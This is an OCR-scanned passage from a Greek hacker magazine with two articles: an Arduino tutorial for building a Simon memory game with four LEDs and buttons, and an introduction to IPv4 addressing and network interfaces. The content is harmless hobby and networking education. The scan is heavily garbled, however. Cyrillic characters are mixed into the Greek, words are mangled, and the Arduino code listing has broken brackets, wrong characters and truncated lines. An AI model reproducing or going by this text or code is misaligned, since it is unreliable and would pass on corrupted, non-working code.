πρόγραμμα θα χωράει άνετα! Επομένως, ακόμα кі αν ἐχουμε κάποιον 
κλώνο του Arduino, µε ενδεχομένως διαφορετικὀ τσιπάκι AVR, το πρὀ- 
γραμμὰ µας οφείλει να λειτουργήσει κανονικά. Το κλασικό παιχνίδι Simon 
ἐχει τέσσερα φωτιζόμενα κουμπιά. Εμεὶς λοιπὀν θα χρειαστούμε τέσσερα 
κουμπιά алла και τέσσερα LED, µιας και δεν υπάρχουν διακόπτες HE EV- 
σωματωμένα LED -- τουλάχιστον ὀχι στα τριγύρω μαγαζιά. Επιπλέον, να 
μην ξεχάσουμε τέσσερις αντιστάσεις, μία για κάθε LEDaki. Αν τις napa- 
λείψουμε εἶναι πολύ πιθανὸ να та δούμε να καίγονται! Ωραίο θέαμα, алла 
ox! για тора. Συνοψίζοντας, θα χρειαστούμε τα παρακάτω: 


e тёсоєра LED οποιουδήποτε χρώματος, ката προτίμηση διαφορε- 
тіка μεταξύ τους 


ο τέσσερις αντιστάσεις 220Ω (ἡ οποιασδήποτε ἀλλης τιμής, арке να 
εἶναι ἴδιες για όλα та LED και στην περιοχἠ апо 1800 ἑως 6300) 


1. deltaHacker 002, tv-game µε то arduino (µέρος 1 апо 2), σελίδα 20. 


Rrduino Saus! 
Αα 


ο τὲσσερα pushbutton (τα αγαπημένα µας πλέον διακοπτάκια :D) 
ο καλώδια για тіс συνδέσεις πάνω στο breadboard 
е va κἀποιο Arduino -- αυτό που ἐχουμε, τέλος πάντων. 


Σίγουρα τα εξαρτήματα αυτἠς της κατασκευἠς σας θυμίζουν προηγούμε- 
уа ἀρθρα. Θα ἐπρεπε, δηλαδή. Αφού συγκεντρώσουμε τα απαιτούμενα 
υλικά, μπορούμε να προχωρήσουμε στην υλοποίηση. 


Το hardware 


Το κύκλωμα που θα υλοποιήσουμε фаіуета! στην Εικὀνα 4. Επιλέξαµε τα 
digitalPin 2, 3, 4 και 5 үа та LED, evo στα 8, 9, 10 και 11 συνδέονται 
τα κουμπιά. Н επιλογἠ των акробектоу ἐγινε σύμφωνα µε δύο κριτήρια: 
Αφενός, θέλαμε να ἐχουμε καθαρές και τακτοποιημένες συνδέσεις, XW- 
ріс πολλά-πολλά μπερδέματα. Αφετέρου, για уа µη γράψουμε περἰπλοκο 
κὠδικα αργότερα, фроутісане να επιλέξουμε διαδοχικούς ακροδέκτες για 
τη σύνδεση ομοειδών στοιχείων. 


Ta LED συνδέονται ὁπως δεἰχνει η εικὀνα του κυκλώματος. Να θυμίσουμε 
πως то πιο μακρύ побаракі των LED εἶναι η ἀνοδος (+) και εἶναι αυτό που 
συνδέεται στο Arduino -- τουλάχιστον στο OIKO µας κύκλωμα. Το κοντύ- 
τερο побарӣкі ονομάζεται κάθοδος (-) και το συνδέουµε στο GND, µέσω 
της αντίστασης. H αντίσταση αυτἠ περιορίζει το ρεύμα που διέρχεται апо 
το LED κι αποτρέπει το κἁψιμὸ του. 


Για τα κουμπιά δεν θα χρησιμοποιήσουμε εξωτερικὲς αντιστάσεις pull-up, 
όπως κάναμε παλιότερα. Αντίθετα, θα χρησιμοποιήσουμε тіс ενσωµατω- 
μένες αντιστάσεις pull-up Tou Arduino. Γλυτώνουμε ETO! τέσσερις AVTI- 
στάσεις κι απλοποιούμε το κύκλωμα. Εξάλλου, η επίπτωση στον κὠδικα 
ano αυτὴἠ την επιλογἠ θα εἶναι αμελητέα (λίγες μόνο γραμμές). 


Έχουμε πλέον τελειώσει µε το κομμάτι του hardware. Σειρἁ тора ἐχει о 
κώδικας, για να δώσουμε στο κύκλωμα ζωή! Όπως каӨе φορά, κάνουμε 
Еуау τελικὀ ἐλεγχο στις συνδέσεις µας και προχωράμε στον κὠδικα. 


Mnepdépata 


Θα το μαρτυρήσω, δεν αντἐχω! Όταν αυτό To άρθρο ἦταν ακόµα ша 
µακρινἠ ιδέα στο μυαλὸ µου, θέλησα уа δω av ἐχει ξαναγίνει κάτι αντἰ- 
στοιχο σε Arduino και φυσικά το пос. Періттд να nw OT! βρήκα πολλές 
αρκετές υλοποιήσεις, µε ακόµα περισσότερες γραμμές κὠδικα η καθεμία, 
οι οποίες κατάφεραν να µε αγχώσουν -- αποτελεσµατικᾶ! Στο HUuqÀÓ µου 
ἠταν αρκετά аплӣ η υλοποίηση. Пат! то ἐκαναν τόσο περἰπλοκο; Μήπως 
μου ξεφεύγει каті; Μήπως το δικὀ τους εἶναι καλύτερο; Αυτά τα ερωτή- 
рата µε βασάνιζαν αρκετὲς μέρες, ὠσπου έβγαλα κάποια συμπεράσματα 
και πῆρα τις αποφάσεις µου. Λάθος прото: Δεν έπρεπε уа επηρεαστώὠ 
ano τους ἄλλους. Λάθος δεύτερο: Ακόμη κι αν οι ἄλλοι ἐχουν κάνει τρο- 
нера πράγματα, εγὠ εἶμαι καλύτερος, εξυπνότερος *KqI* ομορφότερος 
;) Επίσης, εἶμαι και поло µετριόφρων. Στο εξἠς θα ξεχνάω κάθε ξένη 
υλοποίηση και θα κρατάω µόνο τα στοιχεἰα που µου φάνηκαν ὀμορφα ἡ 
έξυπνα -- αν υπάρχουν. Στο κἀτω-κάτω, κάθε προγραμματιστής EXE! το 
бікд του «περίεργον τρόπο σκέψης. Αφού ηρέµησα, архіса να γράφω τον 
κὠδικα για TO Simon, τον οποίο παρεμπιπτόντως μπορείτε να κατεβάσετε 
ano εδώ: 


http://bit.ly/dhe@eSarduinoSimon 


Εικόνα 3 

Фа χρησιµοποι- 
NOOULE ακριβώς 
τους ἰδιους διακό- 
πτες που έχουμε 
δει και παλιότερα. 
Δεν ἐχει αλλάξει 
τίποτα: Ta αντι- 
кріота ποδαράκια 
εἶναι πάντοτε ενω- 
μένα και συνδέο- 
ута! µε та біпЛауа 
τους, όταν πατάμε 
το διακόπτη. 


χά 


Εικόνα 2 

Στην εικόνα φαί- 
νεται η πολικὀ- 
τητα των LED. Σε 
περίπτωση που τα 
LED µας δεν έχουν 
τα κανονικἀ ποδα- 
ракга τους (π.Χ., 
επειδή та κοντύνα- 
µε για το προηγού- 
µενο project µας), 
δεν εἶναι EUKOAO 
va ξεχωρίσουµε 
την ἀνοδο (+) апо 
την κάθοδο (-)! Θα 
πρέπει να κοιτά- 
ξουµε το LED πολύ 
προσεκτικἀ. Στη 
βάση του διαθέτει 
ἑνα γείσο, το οποίο 
апо την nAeupa 
της καθόδου εἰναι 
κομμένο. Κοιτάζο- 
ντας εξάλλου μέσα 
στο LED μπορούμε 
να διακρίνουμε 
την κάθοδο, γιατί 
το ηλεκτρὀδιὀ της 
εἶναι μεγαλύτερο! 
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Εικόνα 4 

Αυτό το κύκλωμα 
πρέπει να υλοποιή- 
σουµε, για να φτιά- 
Соир Το Simon 
game στο Arduino 
µας. Θα χρειαστού- 
µε μόνο τέσσερις 
διακόπτες, τέσσερα 
LED και τέσσερις 
αντιστάσεις! 
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To software 


Στην архі του προγράµµατος ορἰζουµε δύο піуакес (array). Ekei αποθη- 
KEUOUHE τους αριθμούς των ріп, στα οποία συνδέονται οἱ διακόπτες και 
τα LED. H αποθήκευση βέβαια δεν γίνεται µε TUXGIO τρόπο. Με την ἴδια 
σειρὰ που καταγράφουμε та ріп για та LED, πρέπει να καταγράψουμε 
και та ріп για τους διακόπτες. Πα παράδειγµα, αν στην πρὠτη θέση του 
leds[] γράψουμε то ріп για το πάνω αριστερό LED, στην πρώτη θέση του 
buttons[] πρέπει να γράψουμε то рїп για τον πάνω αριστερὀ διακόπτη. H 
καταγραφἠ δηλαδή, γίνεται µε τέτοιο τρόπο ώστε να αντιστοιχίζονται та 
κουμπιά µε Ta LED. 


Στη συνάρτηση setup() ξεκινάμε µε τη ρύθμιση των рїп. Μετατρέπουµε 
σε εξόδους αυτά που χρησιμοποιούνται για τα τα LED και σε εισόδους 
αυτά που χρησιμοποιούνται για τους διακόπτες. Επιπλέον, για τα pin µε 
τους διακόπτες ενεργοποιούµε και τις EOWTEPIKEG αντιστάσεις pull-up. 
Στη συνέχεια, διαβάζοντας την αναλογικἠ εἰσοδο 0 (δεν συνδέεται πουθε- 
νὰ στο κύκλωμα), παίρνουμε Еуау πραγματικἁ τυχαίο αριθμό. Айтбу Tov 
αριθμὸ τον δίνουμε ως seed για τη συνάρτηση random. Αναρωτιέστε үат! 
γίνονται όλα αυτά; Τα νούμερα που µας δίνουν οι συναρτήσεις random 
εἶναι «Ψψευδοτυχαίοι» αριθμοί. Παράγονται δηλαδἠ µε µαθηµατικὀ τρόπο 
κι ακολουθούν πάντα την ἴδια σειρά. Βέβαια, αυτή η σειρά, ακριβέστερα 
αυτή η αλληλουχία αριθμών nou δίνουν οι συναρτήσεις random, εἶναι 
πάρα поло μεγάλη. Αυτὸ εἶναι ιδιαιτερα βολικό! Αν θέλουμε να μοιάζουν 
πραγματικὰ τυχαἰοι οι αριθμοί της random, аркі να της πούμε να ξεκινάει 
κάθε φορὰ апо διαφορετικὀ σημείο της αλληλουχίας. Με аутоу τον тро- 
πο, θα εἶναι πολύ δύσκολο για κάποιον να εντοπίσει την επαναληψιμότητα 
των αριθμών. AUTO ακριβώς πετυχαΐνουμε, δίνοντας στο seed την τιµή 
που µας επέστρεψε ο ADC (Analog to Digital Converter) του Arduino. 
Βλέπετε, η avadoyikn єїсобос 0 δεν συνδέεται πουθενά (εἶναι floating) 
και η τάση που μετράει επάνω της о ADC εἶναι κάθε фора τυχαία. 


w arduino ¿U 1) 


..... 


Arduino Says! 
⁄/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 


Αμέσως μετά τη συνάρτηση setup() ακολουθεἰ η γνωστὴ και µη εξαιρετέα 
loop(). Μέσα с’ αυτἠ υλοποιείται ολόκληρο το παιχνἰδι. Па αρχἡ ορίζουμε 
vav піуака, στον οποίο θα αποθηκεύονται τα βήματα κάθε γύρου (та 
LED που θα ανάβουν κι αντίστοιχα τα κουμπιά που θα πρέπει να πατήσου- 
µε για να ολοκληρωθεί ο γύρος). Στη συνέχεια ορἰζουμε µια μεταβλητή 
για то χρόνο που θέλουμε να διαρκεὶ η επἰδειξη κάθε βήματος στο χρή- 
στη. Προφανώς, ògo μικραϊνει GUTOG ο χρόνος, τόσο πιο δύσκολο γίνεται 
το παιχνίδι. 


Ακολουθεί ἑνας βρὀχος for...loop. Κάθε επανάληψη αυτού του βρόχου 
апотедеі κι Eva γύρο του παιχνιδιού. H μεταβλητή i δείχνει κάθε στιγµή 
τον αριθµὀ του γύρου στον οποίο έχουμε φτάσει κι επιπρόσθετα, το πλἠ- 
θος των βημάτων για αυτό το γύρο. Ας δούμε апо κοντὰ τι συμβαίνει о’ 
αυτό το βρὀχο. 


Στην αρχἠ και χρησιμοποιώντας τη συνάρτηση random, παίρνουμε ¿vav 
ψευδοτυχαἰο αριθμὀ. Αυτός ο αριθμός αποτελεἰ το νέο βήμα που прооті- 
θεται σε κάθε γύρο. Με ἄλλα λόγια, αυτὀὸς ο αριθμός δείχνει ποιο εἶναι 
το νέο λαμπάκι που θα προστεθεί στην αλληλουχία, την onoia πρέπει уа 
απομνημονεύσει και να ауапараүйүгі ο παίκτης. Σαν παράμετρο για τη 
random δίνουμε το πλήθος των біакоптоу του παιχνιδιού (4). Έτσι, η 
συνάρτηση επιστρέφει Еуау τυχαίο αριθμό апо το 0 Ewes то 3. AUTO εἶναι 
βολικό, γιατὶ οι δύο піуакес µας µε Ta ріп των LED και ων διακοπτώὠν, 
ἐχουν апо τέσσερα στοιχεία ο καθένας και δέχονται Eva δείκτη στην NE- 
ριοχὴ [0...3]. 


Εικὀνα 5 

H λογική του 
προγράµµατος εἶναι 
σπλἠ και η υλοποί- 
ηση απλούστερη. 
Δεν χρησιμοποιού- 
µε καμία εξωτερική 
βιβλιοθήκη! Αυτό 
βέβαια δε onuai- 
νει От! το TEAIKO 
αποτέλεσµα δεν ба 
EXE! ενδιαφέρον. 
Ἐτσι δεν εἰναι; :D 


#define CHOICES 4 
#define STEPS 50] 


int leds[] = { 
2, 3, 4, 5); // 
int buttons[] = { 
8, 9, 10, 11); / 


void setup () { 
for (int i= 0; i < CHOICES; 1++) ( 
pinMode (leds[i], OUTPUT}; 
pinMode (buttons[i], INPUT); 
digitalWrite (buttons[i], HIGH}; / 
) 
randomSeed (analogRead (0}}; Βάζουμε σαν " 


) 


void 1оор() { 
int steps[STEPS]; // Εδώ κρατάμε 
unsigned long time = 500; // Ἀρχικός 


ο αριθµό, tov θόρυβο από 


uv 


- 


Εικόνα 6 

Μετά тп μεταγλώτ- 
TION ο κὠδικάς 
µας καταλαμβάνει 
µόνο 2370 bytes! 
Σε σύγκριση µε τα 
32256 bytes που 
χωράει ο µΙκροελε- 
γκτής του Arduino, 
το πρὀγραμμά µας 
είναι λιλιπούτειο! 
Βέβαια, για µια 
τόσο απλή εφαρ- 
µογή θα μπορούσε 
να πει κανείς ότι та 
2370 bytes αποτε- 
λούν σπατάλη :5 
Ωστόσο η ευκολία 
που µας προσέφε- 
ρε το Arduino στην 
κατασκευή του 
παιχνιδιού ήταν 
ανεκτίμητη! 


VHA@KER 


Nnn 


Έφτασε n ора της επἰδειξης. Το прбүранна πρέπει να δείξει την Tuxaia 
αλληλουχία, την οποία καλεῖται να απομνημονεύσει o παἰκτης. AUTO үіуе- 
ται µε Eva βρὀχο for...loop που σαρώνει τον πίνακα µε τα τυχαία βήματα, 
ano τη θέση 0 ос τη θέση (1-1).Έτσι, αν για παράδειγµα βρισκόμαστε 
στον πέμπτο γύρο, ο βρὀχος θα επαναληφθεἰ πέντε φορές, δείχνοντας τα 
πέντε πρὠτα βήματα που βρίσκονται αποθηκευμένα στον πἰνακα steps. 
Па уа απλοποιήσουµε τον κὠδικα, δημιουργήσαμε µια συνάρτηση που 
ανάβει ἑνα LED για συγκεκριµένο XPOVIKO διάστηµα και στη συνέχει το 
σβήνει. То LED nou θα ανάψει κάθε фора καθώς και η διάρκεια καθορἰζο- 
ута! апо παραμέτρους που δέχεται η συνἀρτησή. 


Тора που о παἰκτης cide την ακολουθἰα, πρέπει να την επαναλάβει. П’ 
αυτό то λὀγο δημιουργούμε και пал! Eva βρὀχο for...loop. Ὅπως προηγου- 
μένως, ο βρόχος θα εκτελεστεἰ τόσες φορὲς, ὁσες επιβάλει ο γύρος στον 
οποίο έχουμε φτάσει. Σε κάθε επανάληψη, το πρόγραµµα ελέγχει αν το 
κουμπί που πατήσαμε εἶναι το αναμενόμενο, σύμφωνα µε την αποθηκευ- 
μένη αλληλουχία. Εάν δεν εἶναι, το παιχνίδι τελειώνει! Бау όμως патй- 
σουµετο σωστό κουμπὶ ο βρόχος επαναλαμβάνεται κι ο παἰκτης πρέπει να 
πατήσει το κουμπί που αντιστοιχεἰ στο επόμενο βήμα της ακολουθίας. Па 
τον εντοπισμὀ του κουμπιού που πατάει κάθε фора ο παἰκτης, δηµιουρ- 
γήσαμε την συνάρτηση getButton. Αυτή ελέγχει διαδοχικἁ όλους τους 
διακόπτες του παιχνιδιού кі επιστρέφει εκείνον που θα πατηθεί πρώτος. 


Αφού ολοκληρωθεἰ κι αυτός ο βρόχος, το πρόγραµµα προχωρά στον επὀ- 
μενο γύρο του παιχνιδιού: O πρώτος βρὀχος for...loop που συναντήσαμε 
θα επαναληφθεὶ για μία ακόµα фора. Βέβαια, πριν ano αυτή την επανᾶ- 
ληψη μειώνουμε την τιµή της μεταβλητής time. Με αυτὀν τον τρόπο, πε- 
ριορἰζουµε το χρόνο προβολἠς των βημάτων και το παιχνίδι δυσκολεύει. 
Ναι, кала καταλάβατε: Σε κάθε γύρο αυξάνονται та βήματα που πρέπει 
να θυμάται ο παἰκτης, EVW ο χρόνος που διαθέτει για уа απομνημονεύσει 
την ακολουθία μικραἰνει! 


Τέλος, στην περίπτωση που ο παἰκτης κάνει капою λάθος, καλείται η 
συνάρτηση gameover. Όπως εἶπαμε και πριν, για να τελειώσει το παιχνίδι 
apkei ¿va λάθος2. Το μόνο που κάνει η εν λόγω συνάρτηση εἶναι να ava- 
βοσβήσει μερικὲς φορὲς τα LED του παιχνιδιού, για να δείξει στο χρήστη 
бт! ἐχασε... πανηγυρικἁ :) Πα να ξεκινήσει νέο παιχνίδι ο παίκτης πρέπει 
να πατήσει το κουμπὶ reset, στο Arduino board. 
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Arduino Uno on C 


2. Εἶναι πολύ αυστηρὀ пабі αυτὸς o Simon ;-) 


Rrduino Saus! 
7 “  . “ХА А, Х5Х5ҮӚҚҺУҺ3:Х5 4 5 ОХ hh eh АЯЯиХХ7И.ҒЫ 


That’s (almost) all folks! 


Μπορεὶ уа ολοκληρώσαμε μόλις тора το παιχνιδάκι µας, αλλά аутд δεν 
σημαίνει ὁτι δεν έχουμε NON σκεφτεί тіс πιθανὲς βελτιώσεις. Το αυθεντικό 
Simon game, για κάθε κουμπί-λαμπάκι ἐπαιζε κι Еуау συγκεκριμένο pou- 
σικὀ τόνο. AUTO βοηθούσε πολύ το ανθρώπινο μυαλό» στο να αποµνηµο- 
νεύσει την εκάστοτε αλληλουχία των κουμπιών. Στη δικἠ µας εκδοχή ο 
ἦχος μπορεὶ va προστεθεἰ πολύ εὐκολα, χρησιμοποιώντας τη συνάρτηση 
tone() του Arduino. 


Ὅπως θα προσέξατε, στο πρὀγραμμα του Arduino υπάρχει µια δήλωση 
µε το ὀνομα CHOICES. Πρόκειται για το πλήθος των біакоптфу και кат” 
επέκταση των LED. H ύπαρξη και μόνο αυτἠς της δήλωσης θα έπρεπε va 
σας βάζει σε σκέψεις (και μᾶλλον το ἐχει NON κάνει). Θα μπορούσε Ka- 
vgiç να δυσκολέψει πολύ το παιχνίδι, προσθέτοντας Eva ακόμα ζευγάρι 
diakontn-LED! 


Μπορούμε εὐκολα να χρησιμοποιήσουμε κάποια απὀ тіс τεχνικὲς NOU εἰ- 
бане στα άρθρα της σειράς «Arduino, the way of the hacker», που ξεκινά 
ano το deltaHacker 003. Αν και νοµίζουµε дті µε τέσσερις επιλογὲς και 
πάνω το παιχνἰδι γίνεται αρκετὰ δύσκολο, θα ἦταν ενδιαφέρον va το 
υλοποιούσε κάποιος. Επἰσης, µιας και αναφερθήκαµε στη σειρά, βγἁζο- 
утас πολλὲς ano τις βαριὲς συναρτήσεις του Arduino θα καταφέρουμε уа 
μειώσουμε ката πολὺ τον κὠδικα και, γιατἰ OXI, να φύγουμε τελείως апо 
то Arduino. Exp, αλλά ας µην το συνεχίσουμε, αυτό εἶναι ιστορἱα για GAAO 
арӨро και µε πολύ... ζουμὶ! (Σ.τ.Ε. Zoupi;! Srsly?) 


3. Ἴσως και των θηλαστικών γενικότερα, αλλά δεν καταφέραμε να το δοκιµάσουμµε επιτυχώς... 


Εικὀνα 7 

Στην εργαστη- 
ριακή (εχμ) 
υλοποίηση 
χρησιμοποιήσαμε 
δύο μικρότερα 
breadboard, αντί 
για ἑνα μεγάλο. 
Δίνουν μεγαλύτε- 
ρη ελευθερία στη 
φυσική διάταξη 
του κυκλώματος, 
алла δεν θα то 
προτείναμε στους 
νεοφερμένους. 
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Σκοπὀς µας δεν εἶναι να ξετινάξουµε To Internet Protocol -- τουλάχιστον 
Ох! ακόµα. Θα εξηγήσουμε όμως пос σχηματίζονται οι αριθµητικἐς διευ- 
θύνσεις της ἐκδοσης 4 του ІР (εν συντομία IPv4) και θα δούμε пос µε TH 
βοήθεια του πρωτοκόλλου ορίζονται ἡ οριοθετούνται διάφορα υποδίκτυα. 


Όπως κἀθε σπἰτι χρειάζεται µια µοναδικἡ ταχυδρομική διεύθυνση aà- 
λιὼς κανεὶς δεν µπορεί να στείλει KATI εκεἰ µέσω ταχυδρομείου, ETO! και 
κάθε υπολογιστἠς χρειάζεται µια µοναδικἠ διεύθυνση ІР αλλιώς κανεὶς 
δεν µπορεί να του στείλει κἀτι µέσω δικτύου. Γενικά, Еуас υπολογιστής 
χωρίς διεύθυνση ІР δεν µπορεί να επικοινωνεἰ µε ἄλλους υπολογιστές 
δικτυακά, ὁπου κι αν αυτοί βρίσκονται. Εἶναι λοιπὸν προφανὲς OT! κάθε 
σύγχρονος υπολογιστής ἡ συσκευἠ µε ικανότητες δικτύωσης, χρειάζεται 
τουλάχιστον μία διεύθυνση IP. Και λέμε τουλάχιστον pia ylaTi στην праү- 
ратікотпта каӨе Evepyo network interface έχει τη δικἡ του διεύθυνση ІР, 
και υπάρχουν υπολογιστές µε περισσότερα του ενός network interfaces. 


Πάρτε το παράδειγµα evoc desktop PC, το опоіо συνδέεται στον ADSL 
router του σπιτιού ενσύρματα, µέσω µιας κάρτας Ethernet. Па να μιλάει 
η карта αυτή (network interface) µε τον router, χρειάζεται τη δικἠ της 
διεύθυνση IP ñ апла το δικὀ της ІР. Επιπρόσθετα, ο υπολογιστής ενδέ- 
χεται να ει και µια ασύρματη карта δικτύωσης (ἆλλο network interface 
αυτό), µε την οποία μιλάνε άλλα μηχανήματα ὁπως laptops, smartphones 
κ.ο.κ. Па να εἶναι δυνατή η επικοινωνία, η ασύρματη карта χρειάζεται 
κι αυτή το бїк© της ІР. Θέλετε να πάμε το παράδειγµα λίγο παραπέρα; 
Κανένα πρὀβλημα, πηγαίνει πανεὐκολα. Ας υποθέσουμε, λοιπὸν, ὁτι о 
υπολογιστής EXE] εγκατεστημένο το VirtualBox. Μεταξύ των διαφορε- 
τικὠν ειδών δικτύωσης που παρέχει ο εν λὀγω hypervizor εἶναι και το 
λεγόμενο host-only networking (βλ. και http://deltahacker.gr/?p=2667, 
ειδικἁ την παράγραφο «Εἰδη δικτύωσης για тіс εικονικὲς μηχανές»). Ou- 
σιαστικἀ, To VirtualBox υλοποιεί Eva εικονικὀ network interface τύπου 
Ethernet «εντὸς» του φυσικού υπολογιστή. Μέσω του εικονικού αυτού 
interface επικοινωνούν μεταξὺ τους τα virtual machines µε τύπο δικτύω- 
σης host-only, καθώς кі ο αληθινός υπολογιστής µε Ta VMs (κι αντἰστρο- 
фа). Βεβαίως, µιας και μιλάμε για δικτύωση TCP/IP, εξυπακούεται ὁτι ο 
host-only adapter ἐχει τη δικἠ του διεύθυνση IP! Να Aoinov που μόλις 
περιγράψαμε µια OXI και τόσο ασυνήθιστη περίπτωση υπολογιστή, στον 
οποίο αντιστοιχούν τρεις διευθύνσεις IP (Στην πραγματικότητα του αντι- 
στοιχούν τέσσερις, αφού κάθε συσκευἠ µε ικανότητες δικτύωσης EXE! και 
το λεγόμενο loopback interface, то οποίο εξ ορισμού ἐχει τη διεύθυνση 
127.0.0.1. Αλλά ас µην προτρἐχουμε.) 


Па λόγους απλότητας, για το υπόλοιπο του κειµένου θα θεωρούμε От! 
κάθε υπολογιστής ἡ γενικἀ συσκευή που συμμετέχει σ΄ Eva δίκτυο, EXE! 
μία και μόνο διεύθυνση ІР. Επίσης, опоо ауафероцне то ІР στην праүра- 
τικότητα θα εννοούμε IPv4. 


Το ζήτημα του πλήθους 


Μια διεύθυνση ІР εἶναι ἑνας δυαδικὀς αριθμός μήκους 32bit που αντιστοι- 
xei с’ Evav υπολογιστή ἡ γενικἀ σε µια δικτυακή συσκευή (host) ενὸς 
δικτύου, και την ταυτοποιεἰ μονοσήμαντα μέσα с’ αυτό. 


Σηµείωση: Πα µια εισαγωγἠ στα διάφορα συστήµατα αρίθμησης 
--και кібіка στο δυαδικὀ και στο δεκαεξαδικό--, μπορείτε να διαβά- 
σετε το άρθρο nou φιλοξενούμε στο site του περιοδικού και συγκε- 
κριμένα στη διεύθυνση http://deLtahacker.gr/?p=4192 


Πώς δουλεύουν τα δίκτυα 
Αα 


Από τη στιγµή που οι διευθύνσεις IP εἶναι αριθμοί 32bit, το μέγιστο πλἠ- 
θος διαφορετικὠν TETOIWV αριθμών εἶναι 


2432 = 4,294,967,296 


δηλαδἠ кат! παραπάνω ano τέσσερα δισεκατομμύρια, διακόσια εκατομ- 
μύρια. Apa, ισάριθµο εἶναι και το πλῆθος των hosts που μπορούν να 
συμμετάσχουν с’ Eva δίκτυο ταυτόχρονα, ως ξεχωριστές, μοναδικά διευ- 
θυνσιοδοτημένες οντότητες. Το νούμερο ακούγεται μεγἆλο και σίγουρα 
εἶναι, μόνο που στην πράξη υπάρχουν ορισμένοι περιορισμοὶ ως προς 
τον τρόπο κατανομὴς των διευθύνσεων. Ἔτσι, οι χρήσιμες διευθύνσεις 
IP εἶναι στην πραγματικότητα λιγότερες. Ταυτόχρονα, ο ρυθμός ανάπτυ- 
Ens του Διαδικτύου και των συσκευών που μετέχουν с’ αυτὸ εἶναι τόσο 
γρήγορος, που σήμερα απλά *dev* υπάρχει ελεύθερο μπλοκ διευθύν- 
σεων ІР: ὁλα τους xouv κατανεμηθεὶῖ! Μολαταύτα, χάρη στις τεχνικές 
ΝΑΤ (Network Address Translation) то Internet συνεχίζει να λειτουργεί. 
Ταυτόχρονα, η νέα ἐκδοση Tou ІР, η λεγόμενη 1Ρν6, ἐχει εδώ και χρόνια 
αρχίσει να χρησιμοποιείται πειραματικἁ και капоа στιγμὴ προορἰζεται ν΄ 
αντικαταστήσει πλήρως το πεπαλαιωμένο IPv4. Βέβαια η ἴδια ακριβώς 
φράση ακουγόταν και πριν 12 περίπου χρόνια, тора όμως που та δια- 
Өесіна IPv4 μπλοκ xouv εξαντληθεί εἶναι фауерд дті то μέλλον --ελ- 
niGOUHE OXI το µακρινὀ-- ανήκει στο IPv6. Δεν 8’ ασχοληθούμε eni του 
παρόντος µε тп νέα ἐκδοση Tou IP, θα σημειώσουμε орос ὁτι υποστηρίζει 
διευθύνσεις μήκους 128bit. Επομένως, υπό το IPv6 μπορούμε να έχουμε 
24128 біафоретіка hosts. Αν θέλετε, πηγαίνετε στο Wolfram Alfa кі ava- 
πτύξτε айтп} τη δύναμη. Na τι θα πάρετε: 


27128 = 340,282,366,920,938,463,463,374,607,431,768,211,456 


O αριθμός αυτὸς εἶναι τόσο εκνευριστικἁ μεγάλος, που εἶναι апла αδύ- 
νατον να συλληφθεί апо τον ανθρώπινο νου. Εκτὸς βέβαια κι αν έχουμε 
να κάνουμε µε μαθηματικούς, οι οποίοι ασχολούνται µε την κρυπτογρα- 
φία και καθημερινά συζητούν για δυνάμεις όπως 271024, 272048 και 
234096. AkoUve λοιπὀν για νούμερα опос το 27128 ἡ ακὀµα και για то 
24256 και, δικαιολογημένα, βάζουν та yia. APKETG όμως HE то IPv6, ас 
στρἐψουµε Eava την προσοχὴ µας στο IPV4. 


O! διευθύνσεις IP ano κοντὰ 


Av κι όπως EINGHE πρὀκειται για δυαδικοὺς αριθμούς μήκους 32bit, οι 
διευθύνσεις ІР συνήθως γράφονται ως τέσσερις EEXWPIOTO! αριθμµοἰ του 
δεκαδικού συστήματος. Па την ακρίβεια, ξεκινώντας ano δεξιὰ κάθε 
οκτάδα δυαδικών ψηφίων (octet) μετατρέπεται στον αντίστοιχο δεκα- 
δικό αριθμὸ και οι δεκαδικοἰ αυτοί χωρίζονται μεταξὺ τους µε µια τελεία. 
О συγκεκριμένος τρόπος αναπαράστασης ονομάζεται dotted-decimal. 
Για παράδειγµα, η διεύθυνση IP του υπολογιστή στον опоіо γράφεται το 
παρὸν κείμενο στην πραγματικότητα εἶναι 


00001010000101000001111000000101 


Βάζουμε отоіҳпра ὁτι πουθενὰ δεν ἐχετε δει διεύθυνση ІР γραμμένη кат” 
αυτὸν τον τρόπο. Οὐτε κι εμεὶς. Ας χωρἰσουμε λοιπὸν αυτόν τον παράξε- 
vo αριθµὀ σε τέσσερις ομάδες των окто bit, δηλαδὴ σε τἐσσερα octets: 


00001010 00010100 00011110 00000101 


Μετατρέποντας κἀθε octet στο δεκαδικὀ ισοδύναμο και διατηρώντας τη 
σειρά, παίρνουμε την ακὀλουθη τετράδα δεκαδικὠν αριθμών: 


10 20 30 5 


Στα δίκτυα TCP/IP 
κάθε host πρέπει 
να ἐχει τη δικἠ του, 
μοναδική διεύθυνση 
ІР. Πα την акрі- 
Bela, κάθε network 
interface (карта 
WiFi, Ethernet, 
Bluetooth к.о.к.), 
ασχέτως αν εἶναι 
εικονικὀ ἡ πραγ- 
ματικὀ, πρέπει уа 
έχει το δικὀ του 

ІР. Στο screenshot 
φαίνονται τἐσσε- 
pa διαφορετικά 
network interfaces 
ενός σύγχρονου 
υπολογιστή, καθώς 
και оі διευθύνσεις ІР 
που ἐχει το καθένα 
εξ αυτών. Το (1) 
εἶναι TO λεγόμενο 
loopback interface 
του λειτουργικού 
συστήµατος, το (2) 
είναι το interface 
µιας κάρτας δικτύου 
Ethernet, το (3) 
εἶναι εκείνο του WiFi 
adapter και το (4) 
εἶναι TO εικονικό 
network interface 
τύπου host-only, To 
οποίο ἐχει δηµιουρ- 
γήσει το VirtualBox 
για Το host OS. 
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Вабоутас και τις τελείες, βλέπουμε επιτέλους то IP του υπολογιστή στην 
οικεία μορφὴ dotted-decimal: 


10.20.30.5 


Πρακτικὰ, κάθε єрүалғіо ñ прбүранна nou χειρἰζεται διευθύνσεις ІР τις 
δέχεται και τις παρουσιάζει σε μορφὴ dotted-decimal. Ki αυτὀ γιατί, σε 
αντίθεση µε τους υπολογιστές, οι ἄνθρωποι εἶἰμαστε εξοικειωμένοι µε TO 
δεκαδικὀ σύστημα αρίθμησης κι επομένως το προτιμάμε Еуауті του δυα- 
δικού. Τι να κάνουμε, συνήθειες εἰν’ αυτές... :) 


Δίκτυα και μηχανήματα, μηχανήματα και δίκτυα 


Κάτι που δεν εἶναι εμφανές κοιτάζοντας ша διεύθυνση ІР, εἶναι От! στην 
πραγματικότητα αποτελεἰται and δύο τμήματα: το αριστερότερο, που 
καθορίζει τη λεγόμενη ταυτότητα ἡ διεύθυνση δικτύου (network ID ἡ 
network address), καθώς και το δεξιότερο, που καθορἰζει την ταυτότη- 
